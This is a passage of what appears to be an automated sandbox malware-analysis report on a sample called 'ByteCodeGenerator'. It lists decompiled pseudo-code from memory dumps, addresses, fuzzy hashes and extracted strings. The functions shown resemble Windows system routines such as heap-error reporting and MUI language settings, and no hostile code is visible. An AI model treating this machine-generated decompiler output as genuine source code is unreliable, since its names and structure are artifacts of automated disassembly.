                                  				E0041AF80( *((intOrPtr*)(_a4 + 0xa18)), _t5, _t5 + 0xc98,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x36);
                                  				ExitProcess(_a8);
                                  			}



                                  0x0041a683
                                  0x0041a68c
                                  0x0041a69a
                                  0x0041a6a8

                                  APIs
                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6A8
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ByteCodeGenerator.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  • Opcode ID: 29ddbb9a0d2befd2652fe7b305d9587ac5d52c49df7d1b1d978e65adff3e9728
                                  • Instruction ID: fa26644c9f5a7bbbfa9fa7ae87bae5a72eb177eba219b4a11f12237aa1715187
                                  • Opcode Fuzzy Hash: 29ddbb9a0d2befd2652fe7b305d9587ac5d52c49df7d1b1d978e65adff3e9728
                                  • Instruction Fuzzy Hash: 4BD05EB16012147BC620DF99CC89FD73BA89F457A0F0680A4BE186B242C934FF85CBE1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 408f98bb28fad13db04a7addddd82894b10a77085ba04b0c71b23c49688623a5
                                  • Instruction ID: 0e64d032b35b3d998cbe89a51822748acb3deb99f77375d407e35f5d770b0972
                                  • Opcode Fuzzy Hash: 408f98bb28fad13db04a7addddd82894b10a77085ba04b0c71b23c49688623a5
                                  • Instruction Fuzzy Hash: 80B09B71D015C5C9E711D770470871779047BD1741F16C053D1020A51A4778C091F5BA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  • *** Resource timeout (%p) in %ws:%s, xrefs: 034DB352
                                  • *** A stack buffer overrun occurred in %ws:%s, xrefs: 034DB2F3
                                  • a NULL pointer, xrefs: 034DB4E0
                                  • This failed because of error %Ix., xrefs: 034DB446
                                  • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 034DB38F
                                  • *** Inpage error in %ws:%s, xrefs: 034DB418
                                  • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 034DB39B
                                  • <unknown>, xrefs: 034DB27E, 034DB2D1, 034DB350, 034DB399, 034DB417, 034DB48E
                                  • write to, xrefs: 034DB4A6
                                  • *** then kb to get the faulting stack, xrefs: 034DB51C
                                  • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 034DB323
                                  • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 034DB314
                                  • The resource is owned shared by %d threads, xrefs: 034DB37E
                                  • The critical section is owned by thread %p., xrefs: 034DB3B9
                                  • Go determine why that thread has not released the critical section., xrefs: 034DB3C5
                                  • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 034DB484
                                  • *** An Access Violation occurred in %ws:%s, xrefs: 034DB48F
                                  • The resource is owned exclusively by thread %p, xrefs: 034DB374
                                  • The instruction at %p tried to %s , xrefs: 034DB4B6
                                  • an invalid address, %p, xrefs: 034DB4CF
                                  • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 034DB3D6
                                  • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 034DB53F
                                  • read from, xrefs: 034DB4AD, 034DB4B2
                                  • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 034DB476
                                  • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 034DB47D
                                  • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 034DB2DC
                                  • *** enter .cxr %p for the context, xrefs: 034DB50D
                                  • *** enter .exr %p for the exception record, xrefs: 034DB4F1
                                  • The instruction at %p referenced memory at %p., xrefs: 034DB432
                                  • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 034DB305
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                  • API String ID: 0-108210295
                                  • Opcode ID: d951babca107d8c1cfc129900f02c9c4cc5113d02a8e09ee26701e8d4aff9fcd
                                  • Instruction ID: 2d72998f77abf5084c67891a9e699b084cb8b9e68311e4d42257e9c43a83d7fd
                                  • Opcode Fuzzy Hash: d951babca107d8c1cfc129900f02c9c4cc5113d02a8e09ee26701e8d4aff9fcd
                                  • Instruction Fuzzy Hash: 4781E179A00610FFCB22DE069C69DBF7B35EF47A51F06408BF4141F212D2668562D6BE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 44%
                                  			E034E1C06() {
                                  				signed int _t27;
                                  				char* _t104;
                                  				char* _t105;
                                  				intOrPtr _t113;
                                  				intOrPtr _t115;
                                  				intOrPtr _t117;
                                  				intOrPtr _t119;
                                  				intOrPtr _t120;
                                  
                                  				_t105 = 0x34048a4;
                                  				_t104 = "HEAP: ";
                                  				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                  					_push(_t104);
                                  					E0342B150();
                                  				} else {
                                  					E0342B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  				}
                                  				_push( *0x351589c);
                                  				E0342B150("Heap error detected at %p (heap handle %p)\n",  *0x35158a0);
                                  				_t27 =  *0x3515898; // 0x0
                                  				if(_t27 <= 0xf) {
                                  					switch( *((intOrPtr*)(_t27 * 4 +  &M034E1E96))) {
                                  						case 0:
                                  							_t105 = "heap_failure_internal";
                                  							goto L21;
                                  						case 1:
                                  							goto L21;
                                  						case 2:
                                  							goto L21;
                                  						case 3:
                                  							goto L21;
                                  						case 4:
                                  							goto L21;
                                  						case 5:
                                  							goto L21;
                                  						case 6:
                                  							goto L21;
                                  						case 7:
                                  							goto L21;
                                  						case 8:
                                  							goto L21;
                                  						case 9:
                                  							goto L21;
                                  						case 0xa:
                                  							goto L21;
                                  						case 0xb:
                                  							goto L21;
                                  						case 0xc:
                                  							goto L21;
                                  						case 0xd:
                                  							goto L21;
                                  						case 0xe:
                                  							goto L21;
                                  						case 0xf:
                                  							goto L21;
                                  					}
                                  				}
                                  				L21:
                                  				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                  					_push(_t104);
                                  					E0342B150();
                                  				} else {
                                  					E0342B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  				}
                                  				_push(_t105);
                                  				E0342B150("Error code: %d - %s\n",  *0x3515898);
                                  				_t113 =  *0x35158a4; // 0x0
                                  				if(_t113 != 0) {
                                  					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                  						_push(_t104);
                                  						E0342B150();
                                  					} else {
                                  						E0342B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  					}
                                  					E0342B150("Parameter1: %p\n",  *0x35158a4);
                                  				}
                                  				_t115 =  *0x35158a8; // 0x0
                                  				if(_t115 != 0) {
                                  					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                  						_push(_t104);
                                  						E0342B150();
                                  					} else {
                                  						E0342B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  					}
                                  					E0342B150("Parameter2: %p\n",  *0x35158a8);
                                  				}
                                  				_t117 =  *0x35158ac; // 0x0
                                  				if(_t117 != 0) {
                                  					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                  						_push(_t104);
                                  						E0342B150();
                                  					} else {
                                  						E0342B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  					}
                                  					E0342B150("Parameter3: %p\n",  *0x35158ac);
                                  				}
                                  				_t119 =  *0x35158b0; // 0x0
                                  				if(_t119 != 0) {
                                  					L41:
                                  					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                  						_push(_t104);
                                  						E0342B150();
                                  					} else {
                                  						E0342B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  					}
                                  					_push( *0x35158b4);
                                  					E0342B150("Last known valid blocks: before - %p, after - %p\n",  *0x35158b0);
                                  				} else {
                                  					_t120 =  *0x35158b4; // 0x0
                                  					if(_t120 != 0) {
                                  						goto L41;
                                  					}
                                  				}
                                  				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                  					_push(_t104);
                                  					E0342B150();
                                  				} else {
                                  					E0342B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  				}
                                  				return E0342B150("Stack trace available at %p\n", 0x35158c0);
                                  			}











                                  0x034e1c10
                                  0x034e1c16
                                  0x034e1c1e
                                  0x034e1c3d
                                  0x034e1c3e
                                  0x034e1c20
                                  0x034e1c35
                                  0x034e1c3a
                                  0x034e1c44
                                  0x034e1c55
                                  0x034e1c5a
                                  0x034e1c65
                                  0x034e1c67
                                  0x00000000
                                  0x034e1c6e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x034e1c67
                                  0x034e1cdc
                                  0x034e1ce5
                                  0x034e1d04
                                  0x034e1d05
                                  0x034e1ce7
                                  0x034e1cfc
                                  0x034e1d01
                                  0x034e1d0b
                                  0x034e1d17
                                  0x034e1d1f
                                  0x034e1d25
                                  0x034e1d30
                                  0x034e1d4f
                                  0x034e1d50
                                  0x034e1d32
                                  0x034e1d47
                                  0x034e1d4c
                                  0x034e1d61
                                  0x034e1d67
                                  0x034e1d68
                                  0x034e1d6e
                                  0x034e1d79
                                  0x034e1d98
                                  0x034e1d99
                                  0x034e1d7b
                                  0x034e1d90
                                  0x034e1d95
                                  0x034e1daa
                                  0x034e1db0
                                  0x034e1db1
                                  0x034e1db7
                                  0x034e1dc2
                                  0x034e1de1
                                  0x034e1de2
                                  0x034e1dc4
                                  0x034e1dd9
                                  0x034e1dde
                                  0x034e1df3
                                  0x034e1df9
                                  0x034e1dfa
                                  0x034e1e00
                                  0x034e1e0a
                                  0x034e1e13
                                  0x034e1e32
                                  0x034e1e33
                                  0x034e1e15
                                  0x034e1e2a
                                  0x034e1e2f
                                  0x034e1e39
                                  0x034e1e4a
                                  0x034e1e02
                                  0x034e1e02
                                  0x034e1e08
                                  0x00000000
                                  0x00000000
                                  0x034e1e08
                                  0x034e1e5b
                                  0x034e1e7a
                                  0x034e1e7b
                                  0x034e1e5d
                                  0x034e1e72
                                  0x034e1e77
                                  0x034e1e95

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                  • API String ID: 0-2897834094
                                  • Opcode ID: 61656ce011b99d4e23576b0794869aac9222518e309b4688691a4ded5badb6ff
                                  • Instruction ID: 16f31827bd9c2f136791897348884d05d5996d80d5095e9863774f270f0a5300
                                  • Opcode Fuzzy Hash: 61656ce011b99d4e23576b0794869aac9222518e309b4688691a4ded5badb6ff
                                  • Instruction Fuzzy Hash: FC61283B690664DFC201EBC5D485E35B7A4EB08972B99802FF80AAF311D6749C929F0D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 96%
                                  			E03433D34(signed int* __ecx) {
                                  				signed int* _v8;
                                  				char _v12;
                                  				signed int* _v16;
                                  				signed int* _v20;
                                  				char _v24;
                                  				signed int _v28;
                                  				signed int _v32;
                                  				char _v36;
                                  				signed int _v40;
                                  				signed int _v44;
                                  				signed int* _v48;
                                  				signed int* _v52;
                                  				signed int _v56;
                                  				signed int _v60;
                                  				char _v68;
                                  				signed int _t140;
                                  				signed int _t161;
                                  				signed int* _t236;
                                  				signed int* _t242;
                                  				signed int* _t243;
                                  				signed int* _t244;
                                  				signed int* _t245;
                                  				signed int _t255;
                                  				void* _t257;
                                  				signed int _t260;
                                  				void* _t262;
                                  				signed int _t264;
                                  				void* _t267;
                                  				signed int _t275;
                                  				signed int* _t276;
                                  				short* _t277;
                                  				signed int* _t278;
                                  				signed int* _t279;
                                  				signed int* _t280;
                                  				short* _t281;
                                  				signed int* _t282;
                                  				short* _t283;
                                  				signed int* _t284;
                                  				void* _t285;
                                  
                                  				_v60 = _v60 | 0xffffffff;
                                  				_t280 = 0;
                                  				_t242 = __ecx;
                                  				_v52 = __ecx;
                                  				_v8 = 0;
                                  				_v20 = 0;
                                  				_v40 = 0;
                                  				_v28 = 0;
                                  				_v32 = 0;
                                  				_v44 = 0;
                                  				_v56 = 0;
                                  				_t275 = 0;
                                  				_v16 = 0;
                                  				if(__ecx == 0) {
                                  					_t280 = 0xc000000d;
                                  					_t140 = 0;
                                  					L50:
                                  					 *_t242 =  *_t242 | 0x00000800;
                                  					_t242[0x13] = _t140;
                                  					_t242[0x16] = _v40;
                                  					_t242[0x18] = _v28;
                                  					_t242[0x14] = _v32;
                                  					_t242[0x17] = _t275;
                                  					_t242[0x15] = _v44;
                                  					_t242[0x11] = _v56;
                                  					_t242[0x12] = _v60;
                                  					return _t280;
                                  				}
                                  				if(E03431B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                  					_v56 = 1;
                                  					if(_v8 != 0) {
                                  						L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                  					}
                                  					_v8 = _t280;
                                  				}
                                  				if(E03431B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                  					_v60 =  *_v8;
                                  					L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                  					_v8 = _t280;
                                  				}
                                  				if(E03431B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                  					L16:
                                  					if(E03431B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                  						L28:
                                  						if(E03431B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                  							L46:
                                  							_t275 = _v16;
                                  							L47:
                                  							_t161 = 0;
                                  							L48:
                                  							if(_v8 != 0) {
                                  								L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                  							}
                                  							_t140 = _v20;
                                  							if(_t140 != 0) {
                                  								if(_t275 != 0) {
                                  									L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                  									_t275 = 0;
                                  									_v28 = 0;
                                  									_t140 = _v20;
                                  								}
                                  							}
                                  							goto L50;
                                  						}
                                  						_t167 = _v12;
                                  						_t255 = _v12 + 4;
                                  						_v44 = _t255;
                                  						if(_t255 == 0) {
                                  							_t276 = _t280;
                                  							_v32 = _t280;
                                  						} else {
                                  							_t276 = L03444620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                  							_t167 = _v12;
                                  							_v32 = _t276;
                                  						}
                                  						if(_t276 == 0) {
                                  							_v44 = _t280;
                                  							_t280 = 0xc0000017;
                                  							goto L46;
                                  						} else {
                                  							E0346F3E0(_t276, _v8, _t167);
                                  							_v48 = _t276;
                                  							_t277 = E03471370(_t276, 0x3404e90);
                                  							_pop(_t257);
                                  							if(_t277 == 0) {
                                  								L38:
                                  								_t170 = _v48;
                                  								if( *_v48 != 0) {
                                  									E0346BB40(0,  &_v68, _t170);
                                  									if(L034343C0( &_v68,  &_v24) != 0) {
                                  										_t280 =  &(_t280[0]);
                                  									}
                                  								}
                                  								if(_t280 == 0) {
                                  									_t280 = 0;
                                  									L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                  									_v44 = 0;
                                  									_v32 = 0;
                                  								} else {
                                  									_t280 = 0;
                                  								}
                                  								_t174 = _v8;
                                  								if(_v8 != 0) {
                                  									L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                  								}
                                  								_v8 = _t280;
                                  								goto L46;
                                  							}
                                  							_t243 = _v48;
                                  							do {
                                  								 *_t277 = 0;
                                  								_t278 = _t277 + 2;
                                  								E0346BB40(_t257,  &_v68, _t243);
                                  								if(L034343C0( &_v68,  &_v24) != 0) {
                                  									_t280 =  &(_t280[0]);
                                  								}
                                  								_t243 = _t278;
                                  								_t277 = E03471370(_t278, 0x3404e90);
                                  								_pop(_t257);
                                  							} while (_t277 != 0);
                                  							_v48 = _t243;
                                  							_t242 = _v52;
                                  							goto L38;
                                  						}
                                  					}
                                  					_t191 = _v12;
                                  					_t260 = _v12 + 4;
                                  					_v28 = _t260;
                                  					if(_t260 == 0) {
                                  						_t275 = _t280;
                                  						_v16 = _t280;
                                  					} else {
                                  						_t275 = L03444620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                  						_t191 = _v12;
                                  						_v16 = _t275;
                                  					}
                                  					if(_t275 == 0) {
                                  						_v28 = _t280;
                                  						_t280 = 0xc0000017;
                                  						goto L47;
                                  					} else {
                                  						E0346F3E0(_t275, _v8, _t191);
                                  						_t285 = _t285 + 0xc;
                                  						_v48 = _t275;
                                  						_t279 = _t280;
                                  						_t281 = E03471370(_v16, 0x3404e90);
                                  						_pop(_t262);
                                  						if(_t281 != 0) {
                                  							_t244 = _v48;
                                  							do {
                                  								 *_t281 = 0;
                                  								_t282 = _t281 + 2;
                                  								E0346BB40(_t262,  &_v68, _t244);
                                  								if(L034343C0( &_v68,  &_v24) != 0) {
                                  									_t279 =  &(_t279[0]);
                                  								}
                                  								_t244 = _t282;
                                  								_t281 = E03471370(_t282, 0x3404e90);
                                  								_pop(_t262);
                                  							} while (_t281 != 0);
                                  							_v48 = _t244;
                                  							_t242 = _v52;
                                  						}
                                  						_t201 = _v48;
                                  						_t280 = 0;
                                  						if( *_v48 != 0) {
                                  							E0346BB40(_t262,  &_v68, _t201);
                                  							if(L034343C0( &_v68,  &_v24) != 0) {
                                  								_t279 =  &(_t279[0]);
                                  							}
                                  						}
                                  						if(_t279 == 0) {
                                  							L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                  							_v28 = _t280;
                                  							_v16 = _t280;
                                  						}
                                  						_t202 = _v8;
                                  						if(_v8 != 0) {
                                  							L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                  						}
                                  						_v8 = _t280;
                                  						goto L28;
                                  					}
                                  				}
                                  				_t214 = _v12;
                                  				_t264 = _v12 + 4;
                                  				_v40 = _t264;
                                  				if(_t264 == 0) {
                                  					_v20 = _t280;
                                  				} else {
                                  					_t236 = L03444620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                  					_t280 = _t236;
                                  					_v20 = _t236;
                                  					_t214 = _v12;
                                  				}
                                  				if(_t280 == 0) {
                                  					_t161 = 0;
                                  					_t280 = 0xc0000017;
                                  					_v40 = 0;
                                  					goto L48;
                                  				} else {
                                  					E0346F3E0(_t280, _v8, _t214);
                                  					_t285 = _t285 + 0xc;
                                  					_v48 = _t280;
                                  					_t283 = E03471370(_t280, 0x3404e90);
                                  					_pop(_t267);
                                  					if(_t283 != 0) {
                                  						_t245 = _v48;
                                  						do {
                                  							 *_t283 = 0;
                                  							_t284 = _t283 + 2;
                                  							E0346BB40(_t267,  &_v68, _t245);
                                  							if(L034343C0( &_v68,  &_v24) != 0) {
                                  								_t275 = _t275 + 1;
                                  							}
                                  							_t245 = _t284;
                                  							_t283 = E03471370(_t284, 0x3404e90);
                                  							_pop(_t267);
                                  						} while (_t283 != 0);
                                  						_v48 = _t245;
                                  						_t242 = _v52;
                                  					}
                                  					_t224 = _v48;
                                  					_t280 = 0;
                                  					if( *_v48 != 0) {
                                  						E0346BB40(_t267,  &_v68, _t224);
                                  						if(L034343C0( &_v68,  &_v24) != 0) {
                                  							_t275 = _t275 + 1;
                                  						}
                                  					}
                                  					if(_t275 == 0) {
                                  						L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                  						_v40 = _t280;
                                  						_v20 = _t280;
                                  					}
                                  					_t225 = _v8;
                                  					if(_v8 != 0) {
                                  						L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                  					}
                                  					_v8 = _t280;
                                  					goto L16;
                                  				}
                                  			}










































                                  0x03433d3c
                                  0x03433d42
                                  0x03433d44
                                  0x03433d46
                                  0x03433d49
                                  0x03433d4c
                                  0x03433d4f
                                  0x03433d52
                                  0x03433d55
                                  0x03433d58
                                  0x03433d5b
                                  0x03433d5f
                                  0x03433d61
                                  0x03433d66
                                  0x03488213
                                  0x03488218
                                  0x03434085
                                  0x03434088
                                  0x0343408e
                                  0x03434094
                                  0x0343409a
                                  0x034340a0
                                  0x034340a6
                                  0x034340a9
                                  0x034340af
                                  0x034340b6
                                  0x034340bd
                                  0x034340bd
                                  0x03433d83
                                  0x0348821f
                                  0x03488229
                                  0x03488238
                                  0x03488238
                                  0x0348823d
                                  0x0348823d
                                  0x03433da0
                                  0x03433daf
                                  0x03433db5
                                  0x03433dba
                                  0x03433dba
                                  0x03433dd4
                                  0x03433e94
                                  0x03433eab
                                  0x03433f6d
                                  0x03433f84
                                  0x0343406b
                                  0x0343406b
                                  0x0343406e
                                  0x0343406e
                                  0x03434070
                                  0x03434074
                                  0x03488351
                                  0x03488351
                                  0x0343407a
                                  0x0343407f
                                  0x0348835d
                                  0x03488370
                                  0x03488377
                                  0x03488379
                                  0x0348837c
                                  0x0348837c
                                  0x0348835d
                                  0x00000000
                                  0x0343407f
                                  0x03433f8a
                                  0x03433f8d
                                  0x03433f90
                                  0x03433f95
                                  0x0348830d
                                  0x0348830f
                                  0x03433f9b
                                  0x03433fac
                                  0x03433fae
                                  0x03433fb1
                                  0x03433fb1
                                  0x03433fb6
                                  0x03488317
                                  0x0348831a
                                  0x00000000
                                  0x03433fbc
                                  0x03433fc1
                                  0x03433fc9
                                  0x03433fd7
                                  0x03433fda
                                  0x03433fdd
                                  0x03434021
                                  0x03434021
                                  0x03434029
                                  0x03434030
                                  0x03434044
                                  0x03434046
                                  0x03434046
                                  0x03434044
                                  0x03434049
                                  0x03488327
                                  0x03488334
                                  0x03488339
                                  0x0348833c
                                  0x0343404f
                                  0x0343404f
                                  0x0343404f
                                  0x03434051
                                  0x03434056
                                  0x03434063
                                  0x03434063
                                  0x03434068
                                  0x00000000
                                  0x03434068
                                  0x03433fdf
                                  0x03433fe2
                                  0x03433fe4
                                  0x03433fe7
                                  0x03433fef
                                  0x03434003
                                  0x03434005
                                  0x03434005
                                  0x0343400c
                                  0x03434013
                                  0x03434016
                                  0x03434017
                                  0x0343401b
                                  0x0343401e
                                  0x00000000
                                  0x0343401e
                                  0x03433fb6
                                  0x03433eb1
                                  0x03433eb4
                                  0x03433eb7
                                  0x03433ebc
                                  0x034882a9
                                  0x034882ab
                                  0x03433ec2
                                  0x03433ed3
                                  0x03433ed5
                                  0x03433ed8
                                  0x03433ed8
                                  0x03433edd
                                  0x034882b3
                                  0x034882b6
                                  0x00000000
                                  0x03433ee3
                                  0x03433ee8
                                  0x03433eed
                                  0x03433ef0
                                  0x03433ef3
                                  0x03433f02
                                  0x03433f05
                                  0x03433f08
                                  0x034882c0
                                  0x034882c3
                                  0x034882c5
                                  0x034882c8
                                  0x034882d0
                                  0x034882e4
                                  0x034882e6
                                  0x034882e6
                                  0x034882ed
                                  0x034882f4
                                  0x034882f7
                                  0x034882f8
                                  0x034882fc
                                  0x034882ff
                                  0x034882ff
                                  0x03433f0e
                                  0x03433f11
                                  0x03433f16
                                  0x03433f1d
                                  0x03433f31
                                  0x03488307
                                  0x03488307
                                  0x03433f31
                                  0x03433f39
                                  0x03433f48
                                  0x03433f4d
                                  0x03433f50
                                  0x03433f50
                                  0x03433f53
                                  0x03433f58
                                  0x03433f65
                                  0x03433f65
                                  0x03433f6a
                                  0x00000000
                                  0x03433f6a
                                  0x03433edd
                                  0x03433dda
                                  0x03433ddd
                                  0x03433de0
                                  0x03433de5
                                  0x03488245
                                  0x03433deb
                                  0x03433df7
                                  0x03433dfc
                                  0x03433dfe
                                  0x03433e01
                                  0x03433e01
                                  0x03433e06
                                  0x0348824d
                                  0x0348824f
                                  0x03488254
                                  0x00000000
                                  0x03433e0c
                                  0x03433e11
                                  0x03433e16
                                  0x03433e19
                                  0x03433e29
                                  0x03433e2c
                                  0x03433e2f
                                  0x0348825c
                                  0x0348825f
                                  0x03488261
                                  0x03488264
                                  0x0348826c
                                  0x03488280
                                  0x03488282
                                  0x03488282
                                  0x03488289
                                  0x03488290
                                  0x03488293
                                  0x03488294
                                  0x03488298
                                  0x0348829b
                                  0x0348829b
                                  0x03433e35
                                  0x03433e38
                                  0x03433e3d
                                  0x03433e44
                                  0x03433e58
                                  0x034882a3
                                  0x034882a3
                                  0x03433e58
                                  0x03433e60
                                  0x03433e6f
                                  0x03433e74
                                  0x03433e77
                                  0x03433e77
                                  0x03433e7a
                                  0x03433e7f
                                  0x03433e8c
                                  0x03433e8c
                                  0x03433e91
                                  0x00000000
                                  0x03433e91

                                  Strings
                                  • Kernel-MUI-Language-Disallowed, xrefs: 03433E97
                                  • WindowsExcludedProcs, xrefs: 03433D6F
                                  • Kernel-MUI-Language-Allowed, xrefs: 03433DC0
                                  • Kernel-MUI-Language-SKU, xrefs: 03433F70
                                  • Kernel-MUI-Number-Allowed, xrefs: 03433D8C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                  • API String ID: 0-258546922
                                  • Opcode ID: 660e8d4305884147336bce28f4463f05b84c628d6c98d7128829ecb8bf9ea15c
                                  • Instruction ID: b1f437decc5d62c37c1693a0c41caa225017db22d37f23b56bf4022cc196b9ff
                                  • Opcode Fuzzy Hash: 660e8d4305884147336bce28f4463f05b84c628d6c98d7128829ecb8bf9ea15c
